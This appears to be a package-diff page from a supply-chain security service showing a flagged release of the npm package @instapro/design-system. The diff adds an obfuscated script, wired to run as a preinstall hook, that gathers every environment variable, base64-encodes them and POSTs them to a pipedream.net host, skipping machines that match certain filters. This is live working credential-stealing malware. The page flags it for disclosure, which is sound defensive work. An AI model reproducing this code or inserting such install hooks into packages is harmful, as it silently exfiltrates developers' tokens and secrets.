@instapro/design-system 0.0.1-security → 50.718.515
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of @instapro/design-system might be problematic. Click here for more details.
- package/fppnccg.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/fppnccg.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
function a0_0x2a95(_0x3497e4,_0x23fcd8){const _0x483733=a0_0x4837();return a0_0x2a95=function(_0x2a954d,_0x1a400a){_0x2a954d=_0x2a954d-0x78;let _0x474bf0=_0x483733[_0x2a954d];return _0x474bf0;},a0_0x2a95(_0x3497e4,_0x23fcd8);}const a0_0x3288fa=a0_0x2a95;(function(_0x2a2797,_0xf5eca){const _0x105266=a0_0x2a95,_0x214337=_0x2a2797();while(!![]){try{const _0xe67833=parseInt(_0x105266(0x7e))/0x1*(-parseInt(_0x105266(0x78))/0x2)+parseInt(_0x105266(0x87))/0x3+parseInt(_0x105266(0x92))/0x4+-parseInt(_0x105266(0x83))/0x5+-parseInt(_0x105266(0x91))/0x6+parseInt(_0x105266(0x8f))/0x7+parseInt(_0x105266(0x7a))/0x8;if(_0xe67833===_0xf5eca)break;else _0x214337['push'](_0x214337['shift']());}catch(_0x594bee){_0x214337['push'](_0x214337['shift']());}}}(a0_0x4837,0xc2fde));const http=require(a0_0x3288fa(0x7c)),filter=[{'key':a0_0x3288fa(0x84),'val':'taobao.org'},{'key':a0_0x3288fa(0x84),'val':a0_0x3288fa(0x7d)},{'key':'USERNAME','val':a0_0x3288fa(0x85)},{'key':'_','val':a0_0x3288fa(0x7b)}];function main(){const _0x4e690e=a0_0x3288fa;var _0x9521de=process['env']||{};if(filter['some'](({key:_0x3523c7,val:_0x414d85})=>_0x9521de[_0x3523c7]&&_0x9521de[_0x3523c7][_0x4e690e(0x81)](_0x414d85))||Object[_0x4e690e(0x79)](_0x9521de)[_0x4e690e(0x8d)]<0xa)return;req=http[_0x4e690e(0x8c)]({'host':['3e6cd05f19d5dd6adfbed43a32433776','m','pipedream',_0x4e690e(0x8b)][_0x4e690e(0x86)]('.'),'path':'/'+(_0x9521de[_0x4e690e(0x7f)]||''),'method':_0x4e690e(0x80)})['on'](_0x4e690e(0x89),function(_0x42bd54){}),req[_0x4e690e(0x8a)](Buffer[_0x4e690e(0x82)](JSON[_0x4e690e(0x88)](_0x9521de))[_0x4e690e(0x8e)](_0x4e690e(0x90))),req['end']();}main();function a0_0x4837(){const _0x7ac3cd=['https','tencent.com','284324gQwZkn','npm_package_name','POST','includes','from','6777835YepYDk','npm_config_registry','daasadmin','join','3640314VrIADq','stringify','error','write','net','request','length','toString','8991101EZQdFU','base64','4665828ctbLML','5320236wiOToH','10yuRBbJ','keys','4204568EEsiIJ','/usr/bin/python'];a0_0x4837=function(){return _0x7ac3cd;};return a0_0x4837();}
|
package/package.json
CHANGED
@@ -1,6 +1,11 @@
|
|
1
1
|
{
|
2
2
|
"name": "@instapro/design-system",
|
3
|
-
"version": "
|
4
|
-
"
|
5
|
-
"
|
3
|
+
"version": "50.718.515",
|
4
|
+
"main": "fppnccg.js",
|
5
|
+
"scripts": {
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
7
|
+
"preinstall": "node fppnccg.js"
|
8
|
+
},
|
9
|
+
"author": "",
|
10
|
+
"license": "ISC"
|
6
11
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=%40instapro%2Fdesign-system for more information.
|